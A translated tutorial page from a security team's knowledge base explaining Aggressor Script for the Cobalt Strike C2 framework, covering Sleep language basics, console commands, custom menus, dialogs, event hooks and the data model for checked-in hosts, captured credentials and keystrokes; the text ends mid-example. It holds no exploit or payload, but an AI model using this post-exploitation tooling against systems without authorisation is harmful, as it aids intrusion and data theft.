<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Aggressor-Script | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
<div id="app" data-server-rendered="true"><div class="theme-container"> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="sleep环境的搭建">Setting up the Sleep environment <a href="#sleep环境的搭建" class="header-anchor">#</a></h1> <blockquote><p>C2: Cobalt Strike, a team collaboration tool, usually used in the post-exploitation phase.</p></blockquote> <blockquote><p>Aggressor Script: the scripting language built into C2 (Cobalt Strike) 3.0 and later. It is parsed by Sleep. There is currently no Chinese version of the Sleep documentation, probably because few people use it, so later on I will translate this language. In CS 3.0 and later the menus, options and events are all built from the default default.cna. We can use IRC or webhooks to connect bots and monitoring, for example 瞎子哥's server check-in listener, or plugins such as 梼杌, so this article also explains a few things on the basis of their code.</p></blockquote> <p>Since Aggressor Script is parsed by Sleep, we first need to install the interpreter for that language; Sleep is a Java-based scripting language.</p> <p>Sleep download address: http://sleep.dashnine.org/download/sleep.jar</p> <ul><li><p>Quick start:
<code>java -jar sleep.jar</code>:
<img src="/images/Aggressor-Script/image-20201212181400822.png" alt="image-20201212181400822"></p></li> <li><p>Print hello world:</p> <p>Create a new cna file (cna is the file extension of Aggressor Script scripts) and write in it:</p> <div class="language-java"><pre class="language-java"><code>println("hello world");
</code></pre></div><p>Then load it:
<img src="/images/Aggressor-Script/image-20201212181921731.png" alt="image-20201212181921731"></p> <p>Our first program runs.</p></li></ul> <h1 id="简介">Introduction <a href="#简介" class="header-anchor">#</a></h1> <p>In C2 we can open the Aggressor Script console:</p> <p><img src="/images/Aggressor-Script/image-20201212182434257.png" alt="image-20201212182434257"></p> <p>Here we can use help to view the help information:
<img src="/images/Aggressor-Script/image-20201212182524164.png" alt="image-20201212182524164"></p> <p>The commands are described below:</p> <ul><li><p>?
Evaluates a simple predicate and returns True or False; for example <code>? int(1) == int(2)</code> returns False:</p> <p><img src="/images/Aggressor-Script/image-20201212200112970.png" alt="image-20201212200112970"></p></li> <li><p>e
Executes the code we type, like an interactive mode; without <code>e</code> the code is not executed, for example <code>e println("hello world")</code>:
<img src="/images/Aggressor-Script/image-20201212200347928.png" alt="image-20201212200347928"></p></li> <li><p>help</p> <p>Shows the help information; we used it at the start:</p> <p><img src="/images/Aggressor-Script/image-20201212200445136.png" alt="image-20201212200445136"></p></li> <li><p>load
Loads a cna script; here I load one:
<code>load &lt;cna path&gt;</code>:
<img src="/images/Aggressor-Script/image-20201212200656273.png" alt="image-20201212200656273"></p> <p>The content of the cna loaded here is:</p> <p><img src="/images/Aggressor-Script/image-20201212200723162.png" alt="image-20201212200723162"></p> <p>It creates a command named w; when w is entered it prints hello world.</p></li> <li><p>ls
Shows the cna scripts currently loaded:</p> <p><img src="/images/Aggressor-Script/image-20201212200842985.png" alt="image-20201212200842985"></p></li> <li><p>proff: turns off profiling of the Sleep functions the cna script runs (the author was not sure of its exact purpose)</p></li> <li><p>profile: reports which Sleep functions the cna script has used:
<img src="/images/Aggressor-Script/image-20201212204315502.png" alt="image-20201212204315502"></p></li> <li><p>pron: turns on profiling of the Sleep functions the cna script runs (the author's description of this one was machine-translated)</p></li> <li><p>reload: reloads a cna script. Using the script from before as the example,
I first change the content of the cna:
<img src="/images/Aggressor-Script/image-20201212204558822.png" alt="image-20201212204558822"></p> <p>Then go back to the console and type the command:</p> <p><img src="/images/Aggressor-Script/image-20201212204630060.png" alt="image-20201212204630060"></p> <p>Nothing changed; we reload and run again:
<img src="/images/Aggressor-Script/image-20201212204717719.png" alt="image-20201212204717719"></p></li> <li><p>troff: turns off function tracing, so the details of function execution are not shown:
<img src="/images/Aggressor-Script/image-20201212205115530.png" alt="image-20201212205115530"></p></li> <li><p>tron: turns on function tracing, showing the details of what runs:
<img src="/images/Aggressor-Script/image-20201212205157768.png" alt="image-20201212205157768"></p> <p>We can see what ran: at line 3 of 1.cna we print hello my friend</p></li> <li><p>x: evaluates an expression, for example 1+1. Note that the two numbers must be separated by spaces, otherwise it reports an error:</p> <p><img src="/images/Aggressor-Script/image-20201212205540853.png" alt="image-20201212205540853"></p></li></ul> <h2 id="使用不带gui的c2">Using C2 without a GUI <a href="#使用不带gui的c2" class="header-anchor">#</a></h2> <p>We can use <strong>agscript</strong> to run a C2 client without the GUI; in short, a command-line client:</p> <p>After the team server has been started, on the local machine type:</p> <div class="language-shell"><pre class="language-shell"><code>./agscript [host] [port] [user] [password]
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201212210453219.png" alt="image-20201212210453219"></p> <p>This only gives us a bare Aggressor console. We can append a cna file after the arguments, which 瞎子哥's server check-in script uses:
<img src="/images/Aggressor-Script/image-20201212210803564.png" alt="image-20201212210803564"></p> <p>Used this way, the cna is loaded on the cloud host and no notification is missed; if it is loaded locally, notifications are only received while the client is open.</p> <p>Used this way, our cna code runs first when the connection is established. We write the following cna on the server side:</p> <div class="language-"><pre class="language-text"><code>on ready {
	println("多人运行已经准备好了！准备起飞！！！！"); # message shown on login
}
</code></pre></div><p>Then run it, and our message is displayed:
<img src="/images/Aggressor-Script/image-20201212212726236.png" alt="image-20201212212726236"></p> <h2 id="sleep快速入门">Sleep quick start <a href="#sleep快速入门" class="header-anchor">#</a></h2> <blockquote><p>Since I am translating directly from the official documentation, I will translate this part as well.</p></blockquote> <ul><li>Numbers</li> <li>Strings</li> <li>Arrays</li> <li>Lists</li> <li>Stacks</li> <li>Sets</li> <li>Hashes</li></ul> <p>These are its data types. The first thing to note is that its syntax requires spaces between tokens.</p> <div class="language-java"><pre class="language-java"><code>$name = "kris"; # a string variable
$age = 18;      # a numeric variable

# Array type:
@user_list = @("kris", 18, "四川", "单身"); # a Sleep array (list) is, like Python's, a collection of elements of any type;
                                            # the element types need not match, so it is a compound data type.
println(@user_list[0]); # print an element by index

# Hash type
%dict["name"] = "kris";
%dict["age"] = 18;
%dict["address"] = "sichuan"; # created with the % sigil, somewhat like a Python dict

println("Dict is " . %dict);
</code></pre></div><h3 id="arrays">Arrays <a href="#arrays" class="header-anchor">#</a></h3> <p><img src="/images/Aggressor-Script/image-20201213142244276.png" alt="image-20201213142244276"></p> <p><img src="/images/Aggressor-Script/image-20201213142254825.png" alt="image-20201213142254825"></p> <p>This prints the elements of the list. The syntax for formatted output uses <code>.</code> to concatenate.</p> <h3 id="hashs">Hashes <a href="#hashs" class="header-anchor">#</a></h3> <p><img src="/images/Aggressor-Script/image-20201213143803659.png" alt="image-20201213143803659"></p> <p><img src="/images/Aggressor-Script/image-20201213143841540.png" alt="image-20201213143841540"></p> <h3 id="遍历">Iteration <a href="#遍历" class="header-anchor">#</a></h3> <p>Syntax:</p> <div class="language-java"><pre class="language-java"><code>@name_list = @('kris', 18, 'sichuan');
foreach $var (@name_list)
{
   println($var);
}
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201213144333561.png" alt="image-20201213144333561"></p> <h3 id="push">Push <a href="#push" class="header-anchor">#</a></h3> <p>This is like the append method in Python: it adds data at the end of the list:</p> <div class="language-java"><pre class="language-java"><code>@names = @("Hellen", "Abao");
push(@names, "kris");

print("name :" . @names);
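# Added example, not from the original page: the array, hash, foreach and push
# features from the sections above combined in one script, with the whitespace
# rule observed. Every name and value below is invented for the illustration.
```sleep
# Added example, not from the original page; all names and values are invented.
@users = @();                                   # start with an empty array
push(@users, %(name => "kris",   age => 18));   # %( ... ) is a hash literal
push(@users, %(name => "Hellen", age => 25));
push(@users, %(name => "Abao",   age => 21));

println("count: " . size(@users));              # size() gives the element count

# foreach with $index => $value gives the position as well as the element;
# a scalar holding a hash can be indexed with [] just like %hash itself
foreach $index => $user (@users) {
    println($index . ": " . $user["name"] . " is " . $user["age"]);
}

# iterate a hash directly with $key => $value
%config = %(host => "127.0.0.1", port => 8080);
foreach $key => $value (%config) {
    println($key . " = " . $value);
}

# sort() takes a comparator closure; $1 and $2 are the two elements compared
@by_age = sort({ return $1["age"] <=> $2["age"]; }, @users);
# map() applies a closure to every element and returns the collected results
println("youngest first: " . join(", ", map({ return $1["name"]; }, @by_age)));
```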
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201213145224932.png" alt="image-20201213145224932"></p> <h2 id="简单的交互程序">A simple interactive program <a href="#简单的交互程序" class="header-anchor">#</a></h2> <p>First look at the code:</p> <div class="language-java"><pre class="language-java"><code>sub say_hello {
	println("hello " . $1); # define a function that prints hello + the argument it receives
}

command N {
	say_hello($1); # define a command and pass the first argument it receives to the say_hello function.
}
</code></pre></div><p>Result:</p> <p><img src="/images/Aggressor-Script/image-20201213150323291.png" alt="image-20201213150323291"></p> <p>Using the N command we defined and passing a name after it prints hello + the name you typed: the body of the N command hands the data to say_hello, so hello + our name is printed.</p> <ul><li><p>sub: defining a function
First, how to define a function. In Sleep we use sub to define a function, for example an addition function:</p> <div class="language-"><pre class="language-text"><code>sub add {
	return $1 . "+" . $2 . "=" . ($1 + $2);
}

$sum = add(1, 2);
println($sum);
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201213151226880.png" alt="image-20201213151226880"></p> <p>Here we see it did not print 1+2=3 as we expected. Why? As mentioned earlier, Sleep has fairly strict whitespace requirements: at <code>($1+$2)</code> we did not use spaces correctly, so it raised an error. We only need to fix the spacing (the listing above already shows the corrected form):
<img src="/images/Aggressor-Script/image-20201213151516075.png" alt="image-20201213151516075"></p> <p>And so we have written a function.</p></li> <li><p>command: defining a command
Syntax:</p> <div class="language-shell"><pre class="language-shell"><code>command &lt;your command name&gt;
	{
		code to execute;
	}
</code></pre></div><p>Here we interact through the function we defined ourselves. Above we used N to run the body of say_hello; now a single command does the same job:</p> <div class="language-shell"><pre class="language-shell"><code>command N {
	println("hello " . $1);
}
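# Added example, not from the original page: argument checking in a sub and in
# the command that calls it, so a missing or malformed argument produces a usage
# message instead of a script error. The names greeting/greet and all messages
# are invented for this illustration.
```sleep
# Added example, not from the original page; names and messages are invented.
sub greeting {
    local('$times $i @lines');   # keep these variables local to the sub
    # @_ holds every argument passed to the sub; $1 and $2 are the first two
    if ((size(@_) < 1) || (strlen($1) == 0)) {
        return "usage: greet <name> [times]";
    }
    # only use the second argument as a repeat count when it really is a number
    $times = 1;
    if ((size(@_) >= 2) && (-isnumber $2)) {
        $times = int($2);
    }
    @lines = @();
    $i = 0;
    while ($i < $times) {
        push(@lines, "hello " . $1);
        $i += 1;
    }
    return join("\n", @lines);
}

command greet {
    # the console arguments are passed through as-is; greeting does the checks
    println(greeting($1, $2));
}
```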
</code></pre></div><p><img src="/images/Aggressor-Script/image-20201213152019734.png" alt="image-20201213152019734"></p> <p>This shows that we can write the function body directly in the command, or call a separate function.</p> <p><code>$1</code> is the first argument we receive, and so on: <code>$2</code> is the second argument......</p></li></ul> <h2 id="彩色输出">Colored output <a href="#彩色输出" class="header-anchor">#</a></h2> <p>Simply put, this makes our console print text in color:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>println("\c0This is my color");
println("\c1This is my color"); # this is black
println("\c2This is my color");
println("\c3This is my color");
println("\c4This is my color");
println("\c5This is my color");
println("\c6This is my color");
println("\c7This is my color");
println("\c8This is my color");
println("\c9This is my color");
println("\cAThis is my color");
println("\cBThis is my color");
println("\cCThis is my color");
println("\cDThis is my color");
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>EThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
println<span class="token punctuation">(</span><span class="token string">&quot;<span class="token entity" title="\c">\c</span>FThis is my color&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213145856195.png" alt="image-20201213145856195"></p> <h1 id="cobalt-strike">Cobalt Strike <a href="#cobalt-strike" class="header-anchor">#</a></h1> <h2 id="c2客户端">C2 client <a href="#c2客户端" class="header-anchor">#</a></h2> <p>From version 3.0 on, most of the client interface is built by default.cna: the menus, the default buttons, and the formatted Event Log output we see every day when a host checks in. We will go through them one by one.</p> <h3 id="键盘快捷键">Keyboard shortcuts <a href="#键盘快捷键" class="header-anchor">#</a></h3> <p>Syntax:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">bind</span> <span class="token operator">&lt;</span>key combination to bind<span class="token operator">&gt;</span>
	<span class="token punctuation">{</span>
		command to run when the shortcut is pressed<span class="token punctuation">;</span>
	<span class="token punctuation">}</span>
</code></pre> </div><p>Let's bind one and try it out:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">bind</span> Ctrl+H <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;使用键盘快捷键哦！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># pop up a window with our message</span>
	elog<span class="token punctuation">(</span><span class="token string">&quot;使用了快捷键！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># write the message to the Event Log</span>
<span class="token punctuation">}</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213153451637.png" alt="image-20201213153451637"></p> <p>When we press Ctrl + H, the message pops up right away and, just as the code says, is also written to the Event Log. The key combination is up to you: a single H works as well, adding Ctrl is only a convention, and several modifiers can be combined, for example Ctrl + Shift + H.</p> <h3 id="菜单编写">Writing menus <a href="#菜单编写" class="header-anchor">#</a></h3> <p>A menu is the kind of thing shown below:</p> <p><img src="/images/Aggressor-Script/image-20201213154112698.png" alt="image-20201213154112698"></p> <p>We can define our own menu or add submenu items under an existing top-level menu. The syntax for creating a custom menu is:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup <span class="token operator">&lt;</span>menu function name<span class="token operator">&gt;</span><span class="token punctuation">{</span>
	        item<span class="token punctuation">(</span><span class="token string">&quot;&amp;&lt;submenu label&gt;&quot;</span>, <span class="token punctuation">{</span>code or function to run on click<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># first submenu item</span>
        	separator<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># separator line</span>
        	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;&lt;submenu name&gt;&quot;</span>, <span class="token punctuation">{</span>code or function to run on click<span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># second submenu item</span>
        	separator<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># separator line</span>
<span class="token punctuation">}</span>

menubar<span class="token punctuation">(</span><span class="token string">&quot;top-level menu label&quot;</span>, <span class="token string">&quot;menu function name&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> </div><p>Now let's define a simple menu:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup my_help<span class="token punctuation">{</span>
	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;这是百度&quot;</span>,<span class="token punctuation">{</span>url_open<span class="token punctuation">(</span><span class="token string">&quot;http://www.baidu.com&quot;</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	separator<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;这是谷歌&quot;</span>,<span class="token punctuation">{</span>url_open<span class="token punctuation">(</span><span class="token string">&quot;http://www.google.com&quot;</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># the url_open() function opens a web page</span>
	
<span class="token punctuation">}</span>
menubar<span class="token punctuation">(</span><span class="token string">&quot;帮助菜单&quot;</span>, <span class="token string">&quot;my_help&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># registers the menu function; this line must be present</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213155650731.png" alt="image-20201213155650731"></p> <p>When we click it, the Baidu link opens directly:</p> <p><img src="/images/Aggressor-Script/1.gif" alt="1"></p> <p>If we don't want to create a new menu but add to a default one instead, we can do this:</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>popup help{
	item(&quot;&amp;关于汉化&quot;,{show_message(&quot;4.1汉化 by XXX &quot;)});
	separator();
}
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213160405665.png" alt="image-20201213160405665"> <img src="/images/Aggressor-Script/image-20201213160534566.png" alt="image-20201213160534566"></p> <p>This adds an entry about the localization on top of the existing Help menu. Here we load it from an external cna; you can also edit the default default.cna to add your own entries.</p> <ul><li><p>Right-click menus</p> <p>Besides the menus described above, a menu also opens when we right-click, as shown below:
<img src="/images/Aggressor-Script/image-20201214094754154.png" alt="image-20201214094754154"></p> <p>The syntax for creating such a menu is:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup beacon_bottom<span class="token punctuation">{</span>
    	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;关于作者&quot;</span>, <span class="token punctuation">{</span> url_open<span class="token punctuation">(</span><span class="token string">&quot;https://wgpsec.org&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        	<span class="token punctuation">}</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201214095427815.png" alt="image-20201214095427815"></p> <p>Menus can be nested inside any menu, which gives a multi-level menu. Let's modify the code above:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup beacon_bottom<span class="token punctuation">{</span>
	menu <span class="token string">&quot;关于作者&quot;</span><span class="token punctuation">{</span>
    	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;博客&quot;</span>, <span class="token punctuation">{</span> url_open<span class="token punctuation">(</span><span class="token string">&quot;https://wgpsec.org&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
		item<span class="token punctuation">(</span><span class="token string">&quot;&amp;QQ&quot;</span>, <span class="token punctuation">{</span> show_message<span class="token punctuation">(</span><span class="token string">&quot;1574991635&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        	<span class="token punctuation">}</span>
		<span class="token punctuation">}</span>
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201214100107462.png" alt="image-20201214100107462"></p> <p>A multi-level menu just adds the <code>menu &quot;label shown in the right-click menu&quot;{}</code> form. The biggest difference from the menu writing above is that there is no <code>menubar</code> call, because we are modifying the right-click menu directly, that is, an existing menu.</p></li></ul> <h3 id="输入框的编写">Writing input dialogs <a href="#输入框的编写" class="header-anchor">#</a></h3> <p>Sometimes we want an input box so the user can type something in. For that we build a dialog, which takes three arguments:</p> <p><code>$1</code> the dialog title</p> <p><code>$2</code> the dialog contents (the default values of its fields); there can be several</p> <p><code>$3</code> the callback function, called when the user presses the dbutton_action button</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>popup <span class="token builtin class-name">test</span> <span class="token punctuation">{</span>
	item<span class="token punctuation">(</span><span class="token string">&quot;&amp;收集信息&quot;</span>,<span class="token punctuation">{</span>dialog_test<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># create a menu entry; clicking it calls dialog_test(), which opens the dialog</span>
<span class="token punctuation">}</span>

menubar<span class="token punctuation">(</span><span class="token string">&quot;测试菜单&quot;</span>,<span class="token string">&quot;test&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># register the menu</span>

sub show <span class="token punctuation">{</span>
	show_message<span class="token punctuation">(</span><span class="token string">&quot;dialog的引用是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$1</span><span class="token builtin class-name">.</span><span class="token string">&quot;<span class="token entity" title="\n">\n</span>按钮名称是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$2</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	println<span class="token punctuation">(</span><span class="token string">&quot;用户名是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$3</span><span class="token punctuation">[</span><span class="token string">&quot;user&quot;</span><span class="token punctuation">]</span>.<span class="token string">&quot;<span class="token entity" title="\n">\n</span>密码是：&quot;</span><span class="token builtin class-name">.</span><span class="token variable">$3</span><span class="token punctuation">[</span><span class="token string">&quot;password&quot;</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment"># here show receives the arguments passed over from dialog</span>

<span class="token punctuation">}</span>
sub dialog_test <span class="token punctuation">{</span>
	<span class="token variable">$info</span> <span class="token operator">=</span> dialog<span class="token punctuation">(</span><span class="token string">&quot;这是对话框的标题&quot;</span>,%<span class="token punctuation">(</span>user <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;root&quot;</span>,password <span class="token operator">=</span><span class="token operator">&gt;</span> <span class="token string">&quot;&quot;</span><span class="token punctuation">)</span>,<span class="token operator">&amp;</span>show<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># first argument: the dialog title; second: the default values of the fields defined below (the keys must match the drow_text keys); third: the callback, which receives our input when show is triggered</span>
	drow_text<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;user&quot;</span>,<span class="token string">&quot;输入用户名：&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># add a username input field</span>
	drow_text<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;password&quot;</span>,<span class="token string">&quot;输入密码&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
	dbutton_action<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;马上起飞！&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># clicking the button triggers the callback</span>
	dbutton_help<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;http://www.wgpsec&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># add a Help button</span>
	dialog_show<span class="token punctuation">(</span><span class="token variable">$info</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment"># display the dialog</span>
<span class="token punctuation">}</span>
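
# Added example (not code from the original page): the same dialog, but the
# callback checks its input before acting. The keys "user" and "role" and the
# drow_combobox choices are assumptions chosen for this example.
sub on_submit {
	# $1 = dialog reference, $2 = button label, $3 = hash of the field values
	if ($3['user'] eq &quot;&quot;) {
		show_message(&quot;Username must not be empty (button: $2)&quot;);
		return;
	}
	elog(&quot;dialog '&quot; . $2 . &quot;' submitted for user &quot; . $3['user'] . &quot; with role &quot; . $3['role']);
}

sub dialog_checked {
	local('$d');
	$d = dialog(&quot;Checked input&quot;, %(user =&gt; &quot;&quot;, role =&gt; &quot;reader&quot;), &amp;on_submit);
	drow_text($d, &quot;user&quot;, &quot;Username:&quot;);
	drow_combobox($d, &quot;role&quot;, &quot;Role:&quot;, @(&quot;reader&quot;, &quot;operator&quot;)); # a fixed set of choices instead of free text
	dbutton_action($d, &quot;Submit&quot;);
	dialog_show($d);
}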
</code></pre> </div><p>When the dialog is defined, what the user enters is passed to the function given as the third argument; dialog passes three arguments to that function:</p> <p><code>$1</code> the dialog reference</p> <p><code>$2</code> the button name</p> <p><code>$3</code> the values entered in the dialog</p> <p><img src="/images/Aggressor-Script/image-20201217142103846.png" alt="image-20201217142103846"></p> <p><img src="/images/Aggressor-Script/image-20201217142130910.png" alt="image-20201217142130910"></p> <p>drow_text adds a text input field to the dialog; its syntax is:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>drow_text<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;variable name&quot;</span>,<span class="token string">&quot;prompt text&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> </div><p>dbutton_action adds an action button to the dialog; when it is clicked the dialog closes and the data is passed to the callback function:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>dbutton_action<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;button name&quot;</span><span class="token punctuation">)</span>
</code></pre> </div><p>dbutton_help adds a Help button to the dialog; clicking Help opens the web page:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code>dbutton_help<span class="token punctuation">(</span><span class="token variable">$info</span>,<span class="token string">&quot;https://www.wgpsec.org&quot;</span><span class="token punctuation">)</span>
</code></pre> </div><p>dialog_show displays the dialog.</p> <h3 id="事件处理">Event handling <a href="#事件处理" class="header-anchor">#</a></h3> <p>The Event Log is the panel we look at all the time: when a host checks in, a user logs in or leaves, and so on, it all shows up there:</p> <p><img src="/images/Aggressor-Script/image-20201213161603255.png" alt="image-20201213161603255"></p> <p>This is the status bar:</p> <p><img src="image-20201213163750009.png" alt="image-20201213163750009"></p> <p>Here I use the official example to explain:</p> <div class="language-shell line-numbers-mode"><pre class="language-shell"><code><span class="token builtin class-name">set</span> EVENT_SBAR_LEFT <span class="token punctuation">{</span> <span class="token comment"># set the text on the left of the Event Log status bar</span>
	<span class="token builtin class-name">return</span> <span class="token string">&quot;[&quot;</span> <span class="token builtin class-name">.</span> tstamp<span class="token punctuation">(</span>ticks<span class="token punctuation">(</span><span class="token punctuation">))</span> <span class="token builtin class-name">.</span> <span class="token string">&quot;] &quot;</span> <span class="token builtin class-name">.</span> mynick<span class="token punctuation">(</span><span class="token punctuation">)</span>.<span class="token string">&quot; 正在线上！！&quot;</span><span class="token punctuation">;</span> <span class="token comment"># the text to show: tstamp(ticks()) gives the time and mynick() our nickname; I append "online!!" after it</span>
<span class="token punctuation">}</span>

<span class="token builtin class-name">set</span> EVENT_SBAR_RIGHT <span class="token punctuation">{</span>
	<span class="token builtin class-name">return</span> <span class="token string">&quot;[lag: <span class="token variable">$1</span> $+ ]&quot;</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> </div><p>After modifying it and loading it again, we see that our status bar has changed:</p> <p><img src="/images/Aggressor-Script/image-20201213162001867.png" alt="image-20201213162001867"></p> <p>One more example. We know that when a user comes online it is shown in the Event Log, but that is easy to miss. Say I want a pop-up telling us who connected to our C2 server when someone comes online, and to change the Event Log message as well; then we modify event_join:</p> <blockquote><p>event_join: gives us two values:</p> <p><code>$1</code> - who joined the team server</p> <p><code>$2</code> - the time the message was posted</p></blockquote> <div class="language- line-numbers-mode"><pre class="language-text"><code>on event_join {
	show_message($1.&quot;加入到服务器中！&quot;);
	elog(mynick().&quot;来了！&quot;);
}
</code></pre> </div><p><img src="/images/Aggressor-Script/image-20201213165900331.png" alt="image-20201213165900331"></p> <p>Now it is very clear who has joined our C2 server. When we use our own cna, the default cna is not loaded. For reasons of length I will write up all the supported events later; here we can also see the first line the server uses when a host checks in, the code we run when a machine comes online:</p> <p><img src="/images/Aggressor-Script/image-20201213171747495.png" alt="image-20201213171747495"></p> <p>Official events: https://www.cobaltstrike.com/aggressor-script/events.html</p> <h1 id="数据模型-data-model">Data Model <a href="#数据模型-data-model" class="header-anchor">#</a></h1> <blockquote><p>The data model feels to me like a set of built-in functions: we call them and get data back.</p></blockquote> <p>The C2 server stores all our data on the server: host information, data, downloaded files and so on. So when we join a C2 server we can directly retrieve the information other users have already saved.</p> <h2 id="数据接口-data-api-data-query">Data API: data_query() <a href="#数据接口-data-api-data-query" class="header-anchor">#</a></h2> <blockquote><p>All the data models in C2 will be translated later; here I start with a few simple examples.</p></blockquote> <table><thead><tr><th>Mode</th> <th>Function</th> <th>Meaning</th></tr></thead> <tbody><tr><td>targets</td> <td>stored target information</td> <td>shows hosts that have checked in</td></tr> <tr><td>archives</td> <td>recent messages</td> <td>shows recent output (use with care, it is very slow)</td></tr> <tr><td>beacons</td> <td>all compromised hosts</td> <td>shows hosts that are online or have checked in</td></tr> <tr><td>credentials</td> <td>credential information</td> <td>passwords we have captured and tickets we have created</td></tr> <tr><td>downloads</td> <td>download information</td> <td>shows what we downloaded from the controlled hosts</td></tr> <tr><td>keystrokes</td> <td>recorded keystrokes</td> <td>when we choose to log a process's keystrokes, the captured keystrokes are recorded here</td></tr> <tr><td>screenshots</td> <td>screenshots</td> <td>shows the binary data of our screenshots</td></tr> <tr><td>sites</td> <td>hosted assets</td> <td>appears to be the listener ports we created and the Stager callback ports</td></tr> <tr><td>servers</td> <td></td> <td></td></tr></tbody></table> <p>These data structures (think of them as functions) return the corresponding information as arrays. We can inspect them from the Aggressor Script console, for example:</p> <p><img src="/images/Aggressor-Script/image-20201213191438105.png" alt="image-20201213191438105"></p> <p>Indexing by subscript is supported:</p> <p><img src="/images/Aggressor-Script/image-20201213192346704.png" alt="image-20201213192346704"></p> <p>Dictionary operations work as well:</p> <p><img src="/images/Aggressor-Script/image-20201213192414888.png" alt="image-20201213192414888"></p> <p>We can write a cna to get the current host information:</p> <div class="language-java line-numbers-mode"><pre class="language-java"><code>command info<span class="token punctuation">{</span>
